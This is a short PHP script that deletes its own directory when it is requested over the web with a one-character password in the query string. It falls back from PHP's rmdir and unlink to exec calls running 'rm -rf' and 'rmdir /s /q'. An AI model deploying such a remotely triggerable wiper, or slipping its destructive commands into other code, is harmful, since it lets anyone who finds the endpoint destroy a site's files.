<?php
$password = "p";

if (!isset($_GET['p']) || $_GET['p'] !== $password) {
    die("Unauthorized");
}

$currentDir = __DIR__;
$dirName = basename($currentDir);
$parentDir = dirname($currentDir);
$dirToDelete = $parentDir . DIRECTORY_SEPARATOR . $dirName;

function deleteDirectory($dir) {
    if (!file_exists($dir)) return true;
    if (!is_dir($dir)) return unlink($dir);
    foreach (scandir($dir) as $item) {
        if ($item == '.' || $item == '..') continue;
        if (!deleteDirectory($dir . DIRECTORY_SEPARATOR . $item)) return false;
    }
    return rmdir($dir);
}

function attemptDelete($dir) {
    // Method 1: PHP's rmdir()
    if (rmdir($dir)) return true;

    // Method 2: Recursive deletion
    if (deleteDirectory($dir)) return true;

    // Method 3: System command - rm
    exec("rm -rf " . escapeshellarg($dir) . " 2>&1", $output, $returnVar);
    if ($returnVar === 0) return true;

    // Method 4: System command - rmdir
    exec("rmdir /s /q " . escapeshellarg($dir) . " 2>&1", $output, $returnVar);
    if ($returnVar === 0) return true;

    // Method 5: PHP's unlink() for each file then rmdir()
    $files = array_diff(scandir($dir), array('.','..'));
    foreach ($files as $file) {
        (is_dir("$dir/$file")) ? attemptDelete("$dir/$file") : unlink("$dir/$file");
    }
    return rmdir($dir);
}

if (is_dir($dirToDelete)) {
    echo attemptDelete($dirToDelete) ? "success" : "failure";
} else {
    echo "failure";
}
?>